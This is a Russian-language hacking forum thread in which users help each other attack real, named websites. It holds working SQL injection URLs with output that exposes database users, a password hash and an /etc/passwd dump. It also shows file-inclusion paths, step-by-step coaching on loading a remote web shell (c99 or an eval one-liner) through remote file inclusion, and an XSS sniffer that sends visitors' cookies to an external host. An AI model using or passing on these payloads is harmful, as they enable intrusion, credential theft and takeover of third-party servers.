Функция эта сначала убирает слэши,которые экранируют кавычки(обратные то бишь) и спецсимволы экранируются.Также заменяются символы '\' и ' на хтмл сущности.т.е. бесполезные их варианты при проведении XSS.Ладно.Зато есть инжект в INSERT запросе.

Уязвимые параметры: $email,$url,$ttitle,$description.

Почему я так решил? Проверил на локалхосте:



<?php

$n=mhtml(substr($_GET["x"],0,256));
echo $n;


function mhtml($t)
{
$t=StripSlashes($t);
$t=str_replace("'","'",$t);
$t=str_replace("\"","&quot;",$t);
return $t;
}



?>



Или я неправильно накодил,или стр реплейс не работает.Эта функция не заменяет кавычку вообще.На сервере включён magic_quotes_gpc.

Или я неправильно накодил,или стр реплейс не работает.Эта функция не заменяет кавычку вообще.На сервере включён magic_quotes_gpc.

Функция заменяет кавычку на & # 3 9 ;
Если исходить из того кода что ты дал.

Здравствуйте, не примите за лапуха...но такую ошибку первый раз вижу
http://www.poetryclub.com.ua/author.php?id=2933%20union%20select%201%20--

Database error: next_record called with no query pending. MySQL Error: () Session halted.

поля ордером перебирал

Проверь у себя.Не работает

Загляни в html сорец странички (Вид - Исходный код страницы). Там все будет так как и должно быть.

Хз,что за ошибка,но посимвольный работает:

http://www.poetryclub.com.ua/author.php?id=2933+and+ascii(substring((select+ver sion()),1,1))%3E=1/*

Обрати внимание на поле Опублiковано

Если кавычка превращается в хтмл сущность оной,пусть инезаметно для меня,то инжект нельзя провести ?

2 TELO
http://www.poetryclub.com.ua/author.php?id=2933+UNION+SELECT+CONCAT(0x3a,versio n(),database(),user())+LIMIT+1,1--

Database Version: 5.0.27
Database name: poetryclub
User name: vobushka@localhost

http://www.poetryclub.com.ua/author.php?id=2933+UNION+SELECT+LOAD_FILE(0x2f6574 632f706173737764)+LIMIT+1,1--

# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $
#
root:*:0:0:Charlie &:/root:/bin/csh bla bla bla

Если кавычка превращается в хтмл сущность оной,пусть инезаметно для меня,то инжект нельзя провести ?

Если кавчка заменяется html сущностями, то это уже не кавычка и ничего ты ею не сделаешь.

P.S. кстати скрипт бажный.

Слеши как я понял не экранируются, можно их заюзать:

* тут немного не правильно написал, см мой пост ниже.

mysql_query("INSERT INTO main SET title='$ttitle', description='$description', url='$url', cat1='$c1', cat2='0', cat3='0', gin=0, gout=0, moder_vote=0, email='$email', type=0;") or die(mysql_error());

к примеру:
$url = \
$email = cat1='$c1', cat2='0', cat3='0', gin=0, gout=0, moder_vote=0, email=(select version()), type=0; -- 1

Получиться:

mysql_query("INSERT INTO main SET title='$ttitle', description='$description', url='\', cat1='$c1', cat2='0', cat3='0', gin=0, gout=0, moder_vote=0, email='cat1='$c1', cat2='0', cat3='0', gin=0, gout=0, moder_vote=0, email=(select version()), type=0; -- 1', type=0;") or die(mysql_error());

Чет я не догнал тему о слешах.Без них никак? Смотрю на твой пример и ничего не понимаю(кроме селект версион():(

Чет я не догнал тему о слешах.Без них никак? Смотрю на твой пример и ничего не понимаю(кроме селект версион():(

* в этой мессаге я тебе некоторые вещи цветом пометил.

Ну смотри переменная $ttitle - ей присваиваешь значение '\';
Т.е. слеш.

mysql_query("INSERT INTO main SET title='$ttitle', description='$description', url='$url', cat1='$c1', cat2='0', cat3='0', gin=0, gout=0, moder_vote=0, email='$email', type=0;") or die(mysql_error());

Получается следующее:

mysql_query("INSERT INTO main SET title='\', description='$description', url='$url', cat1='$c1', cat2='0', cat3='0', gin=0, gout=0, moder_vote=0, email='$email', type=0;") or die(mysql_error());

Т.е. он экранирует кавычку идущую после него.
Значит она не будет учавствовать в запросе и будет отображаться как текст, до следующей кавычки (в предыдущем примере я ошибся с $email):

Всё между этими кавычками - будет восприниматься как текст и будет значением колонки url.

mysql_query("INSERT INTO main SET title='\', description='$description', url='$url', cat1='$c1', cat2='0', cat3='0', gin=0, gout=0, moder_vote=0, email='$email', type=0;") or die(mysql_error());

Теперь ты можешь присвоить переменной $description значение и никакие кавычки тебе не помешают.
Предположим значение $description = ', url=0, cat1=0, cat2=0, cat3=0,gin=0, gout=0, moder_vote=0, email={СКЛ инъекция}, type=0; -- '

В запросе будет следующее:

mysql_query("INSERT INTO main SET title='\', description=', url=0, cat1=0, cat2=0, cat3=0,gin=0, gout=0, moder_vote=0, email={СКЛ инъекция}, type=0; -- ', url='$url', cat1='$c1', cat2='0', cat3='0', gin=0, gout=0, moder_vote=0, email='$email', type=0;") or die(mysql_error());

Отбросим лишее (то, что будет за комментировано):

mysql_query("INSERT INTO main SET title='\', description=', url=0, cat1=0, cat2=0, cat3=0,gin=0, gout=0, moder_vote=0, email={СКЛ инъекция}, type=0; -- ") or die(mysql_error());

Далее объясню тебе как юзать такую инъекцию:

1. Или смотришь на то, что добавилось в поле email (если верить названию - оно где то должно отображаться).
2. Или юзаешь more than 1 row (ищи статью Електа).

P.S. А вообще вот тебе две статьи, милый, иди и изучай:

Атака на WEB. Миссия невыполнима (https://forum.antichat.ru/threadedpost973099.html) - а там находишь "[ Фрагментированная SQL-inj ]"
more than 1 row (https://forum.antichat.ru/thread35207.html)

на некотором сайте, при подстановки ' выводится следующая ошибка: Tried to print a stacktrace.unknown(0): /chroot/home/comingso/comingsoon.net/nextra/include/net/nexcess/lib/NexDbUtil.php(183): DB Error: syntax error SELECT user_id, status FROM NEX_ARTICLES WHERE article_id = 1'

подскажите, какая именно это уязвимость, к какой СУБД она относится?

на некотором сайте, при подстановки ' выводится следующая ошибка: Tried to print a stacktrace.unknown(0): /chroot/home/comingso/comingsoon.net/nextra/include/net/nexcess/lib/NexDbUtil.php(183): DB Error: syntax error SELECT user_id, status FROM NEX_ARTICLES WHERE article_id = 1'

подскажите, какая именно это уязвимость, к какой СУБД она относится?

mysql, есть возможность проведения sql инъекции. Преебирай число столбцов (+order+by+...), дальше, если версия не третья, то можно из Бд вытащит данные.

wildshaman, смотри, вот кажись подобрал, дальше пытаюсь вытащить юзеров, БД ну и т.д. Но сейчас не выодит ни ошибки ни инфу, которую я хотел бы .......

УРЛ скинул в личку, посмотри плиз...)

если версия не третья, то можно из Бд вытащит данные.
Если третья, то тоже можно, но немного сложнее.

Да, ошибся, там просто сложнее намного, с тройкой не привык еще работать :)

wildshaman, спасибо за помощь, но всё же хочется добить эту скулю.....
мною был слставлен следующий запрос для вывода имен таблиц: _http://www.comingsoon.net/news.php?id=1+union+select+table_name,2+from+infor mation_schema.tables+where+table_schema=%27comings o_nextra%27

но к сожалению ничего хорошего я не увидел, подскажите, в чем ошибка.....

jecka3000, там переменная передается в несколько запросов, в которых количество столбцов для выборки разное. Это видно по ошибке

Но там так же двойной запрос (результат выборки одного передаются в другой), что мы можем использовать в своих гнусных целях

http://www.comingsoon.net/news.php?id=56269+and+1=2+union+select+(select+con cat_ws(0x2F,name,email,password)+from+NEX_USERS+li mit+0,1),2

Вывод в ошибке
Paul Oehler/poehler@nexcess.net/$1$oXa15J8g$2idU4zZjHnXPyYDu94w2C0

UPDATE:

select+table_name,2+from+information_schema.tables


Там 4 версия - information_schema в ней нет

Я смотрю последнее время в теме тенденция всё усложнять. Двойные запросы неебические конструкции :)

http://www.comingsoon.net/news.php?id=99999999+union+select+concat_ws(0x2F,n ame,email,password),1+from+NEX_USERS+limit+0,1/*

Здравствуйте, подскажите пожалуйсто как можно залить шел через PHP иньекцию
Вот уязвимый сайт
http://www.cyl.ru/index.php?page=3&lang=../%00
Взял я его из раздела PHP иньекции.
Там уже залит шел, мне просто интеренсно, каким способом.... :)

Это не инклуд там file()


http://www.cyl.ru/index.php?page=3&lang=../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00

:)

Это не инклуд там file()


http://www.cyl.ru/index.php?page=3&lang=../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00

:)

Pashkela и что ты нам показал? http://i64.servimg.com/u/f64/12/44/55/09/grey10.gif

Думаю этот смайл --> :) <-- как-бэ должен символизировать какой МОАшник бестолковый, и какие некомпетентные советы он даёт.

Pashkela
Если будет интересно ты просто своим "инклудом" почитай PHP скрипты на сайте. (Они отлично им читаются) и посмотри как это всё работает.

Это такой волшебный инклуд, он запросто читает php. Автор скрипта Девид Блейн, там сверху в копирайтах написано.

Grey: зачем ты тему палишь?) очень хотелось услышать от него, что такое инклуд в его понимание)
jokester : Spyder все равно всех сдал, уже 2 поста палева внизу, и это не предел! :(

Grey, просто многие относят file() и file_get_contents() к инклудам

Кстати, был тут человек в моа, Нитрокс, старички помнят. Вот мы с ним около года назад тоже спорили по поводу инклудов. Он ещё считал что при инклуде не любой файл будет выполняться как пшп-код. Так что это заблуждение очень распространено, а уж про читалки файлов я вообще молчу

2 Grey:


http://www.cyl.ru/index.php?page=3&lang=../../../../../../../../../../../../../../../../../../../../../../../../../tmp/sess_0quou9ch5ubkmtpv5cuotojhd7%00


Как бы дальше типо достаточно что-то купить типо, указать мыло и прочее и обойти фильтр

2 Grey:


http://www.cyl.ru/index.php?page=3&lang=../../../../../../../../../../../../../../../../../../../../../../../../../tmp/sess_0quou9ch5ubkmtpv5cuotojhd7%00


Как бы дальше типо достаточно что-то купить типо, указать мыло и прочее и обойти фильтр
и?

да хз пока что и:))) Задавили авторитетом, был неправ, погорячился

ЗЫЖ Наверное

да хз пока что и:))) Задавили авторитетом, был неправ, погорячился

ЗЫЖ Наверное

Хм, может ты нам по коду покажешь где ты там include() увидел?

http://www.cyl.ru/index.php?page=3&lang=../index.php%00

)) Да, там file, готов понести самое жестокое наказание и впредь думать, прежде чем писать

Grey: ну тогда начинай подготовку к наказанию - запасись хАААрошей клизмой.

Народ,кто-нибудь может показать пример обхода инклуда на этом сайте?

http://www.alertsite.com/phplive/image.php?l=ml'&x=1&deptid=0

Классический пример имхо
Переменная l

Grey, просто многие относят file() и file_get_contents() к инклудам

allow_url_fopen.Не ? В статье какой-то было.Сюда относят функции: file(),file_get_contents(),fopen(),popen().Вро� �е все.Если стоит эта директива в ON,то можно использовать.

allow_url_fopen.Не ? В статье какой-то было.Сюда относят функции: file(),file_get_contents(),fopen(),popen().Вро� �е все.Если стоит эта директива в ON,то можно использовать.
и что ты с этим сделаешь? прочитаешь код своего шелленга удалённого? :D
разве что еси в саенте eval(file($_GET[blablabla])); ну или систем(file($_GET[blablabla]); .......

Мде...как-то не подумал.Но какие-то преимущества давались,блин...

Warning: getimagesize(/usr/virtualweb/netdirekt.de/html/c/cms/images/index_-over.jpg): failed to open stream: No such file or directory in /usr/virtualweb/netdirekt.de/html/c/cms/front_content.php(884) : eval()'d code on line 520

Здесь,я так понял,ничего не сделаешь)

http://www.netdirect.de/c/cms/front_content.php?idart=132&idcat=../../../../../../../../../../etc/passwd%00

Warning: auth_loginform(http://neu.netdirekt.de/c/cms/front_crcloginform.inc.php): failed to open stream: no suitable wrapper could be found in /usr/virtualweb/netdirekt.de/html/c/conlib/local.php on line 654

Warning: auth_loginform(): URL file-access is disabled in the server configuration in /usr/virtualweb/netdirekt.de/html/c/conlib/local.php on line 654

Какой смысл отрубать allow_url_fopen() тогда,если это не влечёт проблем с безопасностью ? Прихоть такая чтоли ?

очень понятно расписано, особенно для обожателей с99шелла ;) :D :
http://www.google.com/search?hl=ru&q=getimagesize&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA&lr=

Какой смысл отрубать allow_url_fopen() тогда,если это не влечёт проблем с безопасностью ? Прихоть такая чтоли ?

до каких то там версий пшп (5.0.* чёто такое) allow_url_fopen растространялось и на file() и на include(), потом ввели allow_url_include

allow_url_include "0" PHP_INI_ALL PHP_INI_SYSTEM in PHP 5. Available since PHP 5.2.0.

В статье какой-то было.

Вот эта статья https://forum.antichat.ru/thread91807.html


Народ,кто-нибудь может показать пример обхода инклуда на этом сайте?
http://www.alertsite.com/phplive/image.php?l=ml'&x=1&deptid=0
l

Сделай так

http://www.alertsite.com/phplive/image.php?l=image.php/./.[...]/././.

Будет

Warning: is_dir(): Stat failed for ./web/image.php......................................... .................................................. .................................................. .................................................. .................................................. ............................. (errno=36 - File name too long)

Это phplive, там фильтрация+file_exists+is_dir. Вот этот двиг нулленный - http://rapidshare.com/files/86879595/Phplive.3.2.2.NULLED-FiXED-LOGOUT.rar
смотри сурс image.php, там правда закоментили кусок кода (видимо химичили пока делали нулл), но сайте все работает

Тык инклуд работает ?)

Люди подскажите плиз. нашол сайт с пхп инклудом. зарегал хостинг, скрипт на пхп написал такой.

<?php
print("<h3>SHELL</h3>");
print(system("ls -al"));
?>

подставил так

http://catenabrasil.com/portal/index.php?arq=http://mysite.ru/mysite.php
отобразилось токо слов SHELL.

Подскажите, как взять сервак под контроль?

Обычный RFI, заливаешь УЖЕ полноценный шелл хоть на народ.ру и просто указываешь ссылку на него - только что проверил на с99-шелле

Но если ты так любишь извращения, то залей на народ.ру (свой сайт) такой eval.txt:


<?=eval($_GET[c])?>


и потом подключи вот так:

http://catenabrasil.com/portal/index.php?arq=http://ник_на_народе.narod.ru/eval.txt&c=phpinfo();

http://catenabrasil.com/portal/index.php?arq=http://ник_на_народе.narod.ru/eval.txt&c=system('ls%20-la');


но в последнем случае пишет:

Warning: system() has been disabled for security reasons


так что не парься и подключай нормальный шелл сразу:)

Подскажите программы,работающие независимо друг друга:
1. Для автоматизированного подбора полей.
2. Для автоматизированного подбора столбцов.
3. Для брута имен столбцов.

SIPT 4.0 НЕ ПОДХОДИТ))

странный чел - а где расширение файла? А что там внутри - мне гадать надо?:))

вот нормальный, рабочий шелл

https://forum.antichat.ru/thread125103.html

заливай на народ.ру, подключай и не забывай указывать расширение файла (тут самый простой, классический RFI - не надо мудрствовать)

PS: Единственное, обзови его .txt, а не php, я тебе еще в пером посте написал - .txt расширение, не php

Люди подскажите плиз. нашол сайт с пхп инклудом. зарегал хостинг, скрипт на пхп написал такой.

<?php
print("<h3>SHELL</h3>");
print(system("ls -al"));
?>

подставил так

http://catenabrasil.com/portal/index.php?arq=http://mysite.ru/mysite.php
отобразилось токо слов SHELL.

Подскажите, как взять сервак под контроль?

ты не так ввел)))надо так http://catenabrasil.com/portal/index.php?arq=http://mysite.ru/mysite.txt

что бы в конце было не пхп а тхт

P.S. пл* у кого корявblе сообщение что аш раздуваются посты ))))

если не понял то стукани в асю

Подскажите программы,работающие независимо друг друга:
1. Для автоматизированного подбора полей.
2. Для автоматизированного подбора столбцов.
3. Для брута имен столбцов.

SIPT 4.0 НЕ ПОДХОДИТ))


http://pashkela.narod.ru/progi/MySql4Bruter.rar - брутер mysql4

http://pashkela.narod.ru/progi/MySQL_column.rar - подбор кол-ва колонок

не всегда пашут, т.к. нет замены /**/ на просто пробел или плюс и прочее. Readme в комплекте

Pashkela, спб за софт, но я так понял, что прога для поиска количесвта колнок подбирает только лишь принтабельный столбец, а сами колонки она игнорирует....)

Народ я умею проводить SQL-inj Но не умею PHP
ПОдскажите можно ли тут что-то сделать
ССылка вида
http://www.сайт.ru/index.php?p=about'
Warning: readfile(./404) [function.readfile]: failed to open stream: No such file or directory in /home/сайт/data/www/сайт.ru/skin/skin.php on line 106

pashkelka,haxtachak спасибо что разъяснили. Я нашол в нете shell c99. залил на народ и запустил. первый раз ничего не отбразилось. 2 раз когда подрдактировал

$surl = "http://catenabrasil.com/portal/index.php?arq="; //link to this script, INCLUDE "?".

чтото появилось, но работает очень жопно.
вот взгляните:

http://s41.radikal.ru/i092/0906/82/13c910c673a0.jpg

и при попытке открыть что либо выскакивает эта шняга.



Warning: include_once(act=ls) [function.include-once]: failed to open stream: No such file or directory in /home/catenabrasil/www/portal/index.php on line 69

Warning: include_once() [function.include]: Failed opening 'act=ls' for inclusion (include_path='.:/usr/share/pear/:/usr/lib/php/') in /home/catenabrasil/www/portal/index.php on line 69

PS обясните плиз новичку. я первый раз делаю такое
модет кто даст линки на более простые шеллы и описание их конфига?

странный чел - а где расширение файла? А что там внутри - мне гадать надо?:))
.....
заливай на народ.ру, подключай и не забывай указывать расширение файла (тут самый простой, классический RFI - не надо мудрствовать)
....
PS: Единственное, обзови его .txt, а не php, я тебе еще в пером посте написал - .txt расширение, не php

Дружище, я смотрю вчерашняя беседа прошла даром.
Вот код из скрипта:
<?
$arq = $_REQUEST["arq"];

if ((isset($arq)) and ($arq != "")){
include_once($arq);
}
elseif (isset($_POST['keyGen'])){
include_once($arq);
}
else {
include_once('empresa.php');
}
?>

ЭТО ИНКЛУД!!! И ему абсолютно пофигу какое расширение и есть ли оно вообще. И уж тем-более на народе.

ЗЫ Только не надо мне рассказывать , что при инклуде .php он исполнится на стороне того сервера, (я это как-бэ знаю). Народ это не тот случай, и не путай новичка пожалуйста

2 jokester:

Да, я и не спорю, просто в данном конкретном случае .php не прокатывало никак, на народе, извините, .php не может "исполница"

Вот не работало и всё. Только .txt прокатывало или любое другое расширение, кроме .php

Проверь плиз, может я ваще после выходных с катушек съехал:))

PS: А, дошло, если с99 запороленный - то фиг, wso2 пофигу, поэтому так и подумал

В общем jokester прав как всегда:))

загвоздка была в том, чтобы с99 не был запороленный

2 jokester:

Да, я и не спорю, просто в данном конкретном случае .php не прокатывало никак, на народе, извините, .php не может "исполница"

Вот не работало и всё. Только .txt прокатывало или любое другое расширение, кроме .php

Проверь плиз, может я ваще после выходных с катушек съехал:))
Отлично всё работает

2 jokester:

Да, я и не спорю, просто в данном конкретном случае .php не прокатывало никак, на народе, извините, .php не может "исполница"

Вот не работало и всё. Только .txt прокатывало или любое другое расширение, кроме .php

Проверь плиз, может я ваще после выходных с катушек съехал:))

PS: А, дошло, если с99 запороленный - то фиг, wso2 пофигу, поэтому так и подумал

В общем jokester прав как всегда:))

загвоздка была в том, чтобы с99 не был запороленный
jokester ..у меня тоже такая фигня была....но чем не факт сделать тхт? :) если получилось , работает)то смысл судить

но чем не факт сделать тхт? :) если получилось , работает)то смысл судить
дабы не путать новичков и не создавать ложных предрасудков и стереотипов

HAXTA4OK

Я уже несколько раз говорил, в чём разница. От непонимания возникают новые вопросы. Сделать тупо как показали, не поняв как это работает, это не выход. Советы должны быть максимально простыми и понятными, без лишних наворотов и путаницы

дабы не путать новичков и не создавать ложных предрасудков и стереотипов
и вот ты думаешь что он понял что все ему написали? он просто по примеру сделал с тхт...дык и пусть потом пробует так!. а вот если не получится то спросит..а щас ему тут все понапишут и он вообще не поймет и бросит(не факт)
P.S. он хоть с тхт понял)))) так и пусть делает так



####################################
jokester

Советы должны быть максимально простыми и понятными, без лишних наворотов и путаницы

и вот ты думаешь что он понял что все ему написали?


P.S.пусть идет по ступенькам на примерах :)
##################################
main()

на тебе шелл ..позаимствовал у mailbrush _http://bestquest.info/shell.txt

Это от меднета шелл, не от меня :)

Люди помогите плиз. Надо написать самый примитивный снифире XSS на php. читал статью
на ачате про XSS но снифер там какойто мудрённый, с шифрованием,с картинкой и т.д. надо простой сниф и всё может кто накатает. я вот накатал чтото похожее

<?php
$file="log.txt";
$data=date("d.m.Y");
$time=date("H.i");

$ip=trim($_SERVER['REMOTE_ADDR']);
$agent=trim($_SERVER['HTTP_USER_AGENT']);


$fo=fopen($file,"a");
$res="$data|$time|$ip|$agent";
$fw=fputs($fo,$res);
fclose($fo);
?>

но как ему передать куки этому скрипту?

Сниффер получает даные, переданые GET'oм, т.е. QUERY_STRING. Если сниффер - картинка - он загружается с даными, т.е. куками. Если ты хочешь без картинки - надо будет редиректить.

PS: Юзайте мой сервис http://forum.antichat.ru/thread125329.html

Сниффер получает даные, переданые GET'oм, т.е. QUERY_STRING. Если сниффер с картинкой - он загружается с даными, т.е. куками. Если ты хочешь без картинки - надо будет редиректить.

PS: Юзайте мой сервис http://forum.antichat.ru/thread125329.html

Помоги плиз изминитиь тот скрипт чтобы он через
QUERY_STRING записывал в файл. и составить url на багу. помогите плиз

не понимаю в чем ошибка моего запроса, вроде версия 5.0.51a-24-log
http://www.rocit.ru/news/ITshownews.php3?id=-1+union+select+1,2,3,4,table_name,6,7,8,9,10+from+ information_schema.tables+where+table_schema=%27ro cit%27--

но ничего хорошего я не вижу.....

не понимаю в чем ошибка моего запроса, вроде версия 5.0.51a-24-log
http://www.rocit.ru/news/ITshownews.php3?id=-1+union+select+1,2,3,4,table_name,6,7,8,9,10+from+ information_schema.tables+where+table_schema=%27ro cit%27--
но ничего хорошего я не вижу.....
http://www.rocit.ru/news/ITshownews.php3?id=-1+union+select+1,2,3,4,table_name,6,7,8,9,10+from+ information_schema.tables

http://www.rocit.ru/news/ITshownews.php3?id=-1+union+select+1,2,3,4,table_name,6,7,8,9,10+from+ information_schema.tables+where+table_schema=0x726 f636974--
мэджики включены

jecka3000 почитай статьи, любые
http://www.rocit.ru/news/ITshownews.php3?id=-1+union+select+1,2,3,4,table_name,6,7,8,9,10+from+ information_schema.tables+where+table_schema=0x726 F636974--

wildshaman я же писал про набивание постов , а ты сказал, что ничего такого не будет.

wildshaman[/B] я же писал про набивание постов , а ты сказал, что ничего такого не будет.
Лично я не набиваю, (я не стремлюсь ни в РОА, ни в МОА, ни выше) а просто помогаю человеку.
Теперь любая помощь в тематических разделах считается набиванием постов?

Помоги плиз изминитиь тот скрипт чтобы он через
QUERY_STRING записывал в файл. и составить url на багу. помогите плиз
fwrite(fopen('query.txt','a+'),$_REQUEST['QUERY_STRING']."\r\n")Запись квери_стринг. Редирект примерно такой <script>location="http://site.ru/snifffer.php?"+document.cookie</script>

jokester, я достиг такого же результаты с помощью LIMIT 28,1 -- Именн тут база мне ответила user

зато на такой запрос http://www.rocit.ru/news/ITshownews.php3?id=-1+union+select+1,2,3,4,column_name,6,7,8,9,10+from +information_schema.columns+where+table_name=%27us er%27 жу ничего не выводит...

jecka3000
Я- же написал, почитай любую статью. mailbrush тебе написал, включены маджики, тоеть кавычки экранируются.

Переводи в хекс
http://www.rocit.ru/news/ITshownews.php3?id=-1+union+select+1,2,3,4,column_name,6,7,8,9,10+from +information_schema.columns+where+table_name=0x757 36572

Теперь любая помощь в тематических разделах считается набиванием постов?
Дружище, не нужно переиначивать. Сообщения не по теме - это набивание постов, а попросту оффтоп.

Применительно к данному случаю:

Человек делает выборку из конкретной базы, а ты ему даёшь запрос выборки из всех баз. Он и без тебя , думаю , с этим справлялся. Отсюда вывод: совет не в тему , стало-быть оффтоп.

http://www.rocit.ru/news/ITshownews.php3?id=-1+union+select+1,2,3,4,column_name,6,7,8,9,10+from +information_schema.columns+where+table_name=0x757 36572Юзай хекс, читай статьи. Тебе же линк дали!

fwrite(fopen('query.txt','a+'),$_REQUEST['QUERY_STRING']."\r\n")Запись квери_стринг. Редирект примерно такой <script>location="http://site.ru/snifffer.php?"+document.cookie</script>

Спасибо огромное. поставте ктонить ему +
Я новичок могу только 0

Кто нибудь покажите где здесь уязвимость?

Найдено: /?PageServices
Найдено: /?wp-cs-dump
Найдено: /?wp-html-rend
Найдено: /?wp-stop-ver
Найдено: /?wp-uncheckout
Найдено: /?wp-usr-prop
Найдено: /?wp-ver-diff
Найдено: /?wp-verify-link
Найдено: /?wp-ver-info
Найдено: /index.php?IDAdmin=test
Найдено: /index.php?base=test
Найдено: /index.php?SqlQuery=test
Найдено: index.php?tampon=test
Найдено: /index.php?name=Members_List&letter=All&sortby=pass
Найдено: /index.php?name=Members_List&letter=All&sortby=uid
Найдено: /server-status/
Найдено: /index.php?name=Web_Links&ratinglid=96&ratinguser=?&ratinghost_name=?&rating=99999999999999999999999
Найдено: index.php?module=calendar&calendar[view]=month&month=11&year=9
Найдено: /index.php?do=ext&page=http://bugdurito.narod.ru/cmd.php&cmd=id
Найдено: /index.php?method=`
Найдено: /index.php?a=lostpw&set=1&id=`
Найдено: index.php?a=lostpw&set=1&session_id=`
Найдено: /index.php?showforum=1&prune_day=100&sort_by=Z-A&sort_key=
Найдено: /index.php?method=`
Найдено: /index.php?a=lostpw&set=1&id=`
Найдено: /index.php?a=lostpw&set=1&session_id=`
Найдено: /?page='
Найдено: /?page=shop/cart&func=cartAdd&product_id='
Найдено: /?page=shop/browse&category_id=&offset='
Найдено: /?page=admin/index&GulfTech=">
Найдено: /index.php?option=content&task=view&id='
i vot eshe
/cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1

а полный линк не хошь выложить?

а полный линк не хошь выложить?
Да пожайлуста

ka4ni.ру

Скажи и мне что там мона сделать особенно вот с этим
/cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1

ПР 6.
Не расковырял.
http://www.libyaonline.com/business/details.php?id=1'

isher2003, Да ничего, просто двиг, при нахождении некоторых символов орет - хакинг аттемпт (т.е. попытка взлома).

Тык инклуд работает ?)

http://www.alertsite.com/phplive/image.php?l=image.php

Так работает/будет работать или нет/не будет работать ? Ответа я так и не получил.Мне только выводит is_dir() функцию,как ты и писал.

ПР 6.
Не расковырял.
http://www.libyaonline.com/business/details.php?id=1'

Заурядная скуля

http://www.libyaonline.com/business/details.php?id=9846+and+1=if(ascii(substring((sele ct+user_password+from+users+limit+0,1),1,1))>1,1,0)

Рядом есть с выводом

http://www.libyaonline.com/music/artist.php?id=-64+union+select+1,user_password,3,4,5,6+from+users +limit+0,1--+


Валемир, я думаю что нет

привет. Возможно ли через xss баг произвести sql инъекцию, если да то как?

Кто чем ищет логи (конфиги итд....) апача при LFI?

привет. Возможно ли через xss баг произвести sql инъекцию, если да то как?
Нет.

Кто чем ищет логи (конфиги итд....) апача при LFI?
http://forum.antichat.ru/thread49775.html

Нет.


http://forum.antichat.ru/thread49775.html
нет vailbrush ты сильно ошибаешся, я уже где то подробное описание видел на английском которое выполняли на xss ке тоесть внутри xss sql запросы, но к сожалению забыл где нашел. Вот поэтому спросил может здесь в ачате уже знают.
Вы еще скажите мне на запросе
1>"><ScRiPt%20%0a%0d>alert(401223179617)%3B</ScRiPt>

вместо номера 401223179617 фильтруется символы, как обходит этого? Чем зашифроват запрос?

нет vailbrush ты сильно ошибаешся, я уже где то подробное описание видел на английском которое выполняли на xss ке тоесть внутри xss sql запросы, но к сожалению забыл где нашел. Вот поэтому спросил может здесь в ачате уже знают.


ты не прав, XSS выполняется у тебя в браузере, а sql запросы идут к базе данных. Можно внутри sql инъекции заюзать xss, но не наоборот.

а понял значит я перепутал, спасибо

http://www.mieszkania.inter-bud.pl/m-os.php?id=115
PostgreSQL. Статью читал, но ни ордер баем ни юнион селектом не подобрал. Прошу помощи :)http://www.gambitlive.com/night.php?id=90
MySQL 5 (по блинду узнал), но юниона не читает. Можно сделать вывод там?

Подскажие пожалуйста сканеры ТОЛЬКО SQL-inj , которые сканировали бы, например, сайт на параметарезированные ссылки. (Что-то типа запроса к гуглу: site: moy_Sayt.ru inurl:"ID=")
SIPT,NetDeviLz SQL Scanner не катят))

http://forum.antichat.ru/thread49775.html

Архивчик битый в этой теме, перезалейте плиз.

http://www.mieszkania.inter-bud.pl/m-os.php?id=115
PostgreSQL. Статью читал, но ни ордер баем ни юнион селектом не подобрал. Прошу помощи :)http://www.gambitlive.com/night.php?id=90
MySQL 5 (по блинду узнал), но юниона не читает. Можно сделать вывод там?


можно, вот:
http://www.gambitlive.com/index.php?page=gallery&&albumid=409+union+select+1,user(),3,4,5,6,7,8+limi t+1,1--

никак не могу подобрать столбцы, хотя на лицо, что это обычная MySQL inj
http://www.extreme-shop.ru/ru/catalogue/detail.shtml?CATALOGUE_ID=3&PRODUCT_ID=619
подскажите плиз))

http://www.extreme-shop.ru/ru/catalogue/detail.shtml?CATALOGUE_ID=3&PRODUCT_ID=619+order+by+4/*

4-ый мускул
http://www.extreme-shop.ru/ru/catalogue/detail.shtml?CATALOGUE_ID=3&PRODUCT_ID=619+and+substring(version(),1,1)=4

p.s. раскручивайте её как слепую, имхо.

if (!IsSet($t)&!IsSet($f))
{
$f="main";
$filename=$f . ".php";
}
else
{
if (IsSet($t)&!IsSet($f))
{
$filename=$t . "/index.php";
}
if (IsSet($t)&IsSet($f))
{
$filename= $t . "/" . $f . ".php";
}
if (!IsSet($t)&IsSet($f))
{
$filename=$f . ".php";
}
}
if (file_exists("$filename"))
{ include("$filename"); }
else
{ echo " <div class=\"alert\"> 404, . </div>"; }


Можно ли в такое инъекцию провести и как?

насколько позволяет моя квалификация... в этом коде возможна php-inj
защиты тут в общем-то никакой нет.

расширение отбрасывайте с помощью null-byte либо с помощью усечения...

2 Byrger
ты же уже задавал этот вопрос, не доходчиво объяснили?
https://forum.antichat.net/printthread.php?t=46016&page=185&pp=40

4-ый мускул
http://www.extreme-shop.ru/ru/catalogue/detail.shtml?CATALOGUE_ID=3&PRODUCT_ID=619+and+substring(version(),1,1)=4

p.s. раскручивайте её как слепую, имхо.

Подзапросами, которых в этой версии нету?

Попробуй покрутить скуль в другом месте.

2 Byrger
ты же уже задавал этот вопрос, не доходчиво объяснили?
https://forum.antichat.net/printthread.php?t=46016&page=185&pp=40
Не проходит я же написал помойму

подскажите плиз как дораскрутить....4* всегда вызывает у меня проблемы..., если можно, то с небольшими разъяснениями( Ососбенно как подобрать имена таблиц и колонок) вот до чего дошел я(до принтаьельной колонке):

http://www.gsl.ru/publicate/pub_content.php?id=-1+union+select+1,2,3,4,5,6,7--

http://www.gsl.ru/publicate/pub_content.php?id=-1+union+select+1,2,3,4,concat_ws(char(58),username ,password),6,7+from+users--

дальше сам подбирай другие колонки и таблици...

ttp://times.ua/search/results/?keyword=1'Это инъекция?

Подскажие пожалуйста сканеры ТОЛЬКО SQL-inj , которые сканировали бы, например, сайт на параметарезированные ссылки. (Что-то типа запроса к гуглу: site: moy_Sayt.ru inurl:"ID=")
SIPT,NetDeviLz SQL Scanner не катят))
Acunetix Web Vulnerability Scanner 6.x, Core Impact 7.5
Мошнее я не видел еще

ttp://times.ua/search/results/?keyword=1'Это инъекция?
Да

http://times.ua/search/results/?keyword=1'+and+1=2+union+select+1,2,3,table_name+ from+information_schema.tables--+

